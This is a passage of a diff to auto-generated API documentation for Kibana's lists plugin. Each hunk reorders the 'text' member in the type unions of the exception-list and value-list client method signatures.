\"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, @@ -881,7 +881,7 @@ "section": "def-server.CreateExceptionListItemOptions", "text": "CreateExceptionListItemOptions" }, - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, @@ -929,7 +929,7 @@ "section": "def-server.UpdateExceptionListItemOptions", "text": "UpdateExceptionListItemOptions" }, - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, @@ -971,7 +971,7 @@ "signature": [ "({ id, itemId, namespaceType, }: ", "DeleteExceptionListItemOptions", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, @@ -1041,7 +1041,7 @@ "signature": [ "({ id, itemId, }: ", "DeleteEndpointListItemOptions", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, @@ -1075,7 +1075,7 @@ "signature": [ "({ listId, filter, perPage, pit, page, searchAfter, sortField, sortOrder, namespaceType, }: ", "FindExceptionListItemOptions", - ") => Promise<({ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }) | null>" + ") => Promise<({ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }) | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, @@ -1111,7 +1111,7 @@ "signature": [ "({ listId, filter, perPage, pit, page, searchAfter, sortField, sortOrder, namespaceType, }: ", "FindExceptionListsItemOptions", - ") => Promise<({ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }) | null>" + ") => Promise<({ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }) | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, @@ -1147,7 +1147,7 @@ "signature": [ "({ perPage, pit, page, searchAfter, sortField, sortOrder, valueListId, }: ", "FindValueListExceptionListsItems", - ") => Promise<({ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }) | null>" + ") => Promise<({ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }) | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, @@ -1219,7 +1219,7 @@ "signature": [ "({ filter, perPage, page, pit, searchAfter, sortField, sortOrder, }: ", "FindEndpointListItemOptions", - ") => Promise<({ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }) | null>" + ") => Promise<({ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }) | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, @@ -1668,7 +1668,7 @@ "signature": [ "({ id }: ", "GetListOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; } | null>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, @@ -1704,7 +1704,7 @@ "signature": [ "({ id, deserializer, immutable, serializer, name, description, type, meta, version, }: ", "CreateListOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, @@ -1740,7 +1740,7 @@ "signature": [ "({ id, deserializer, serializer, name, description, immutable, type, meta, version, }: ", "CreateListIfItDoesNotExistOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" ], "path": 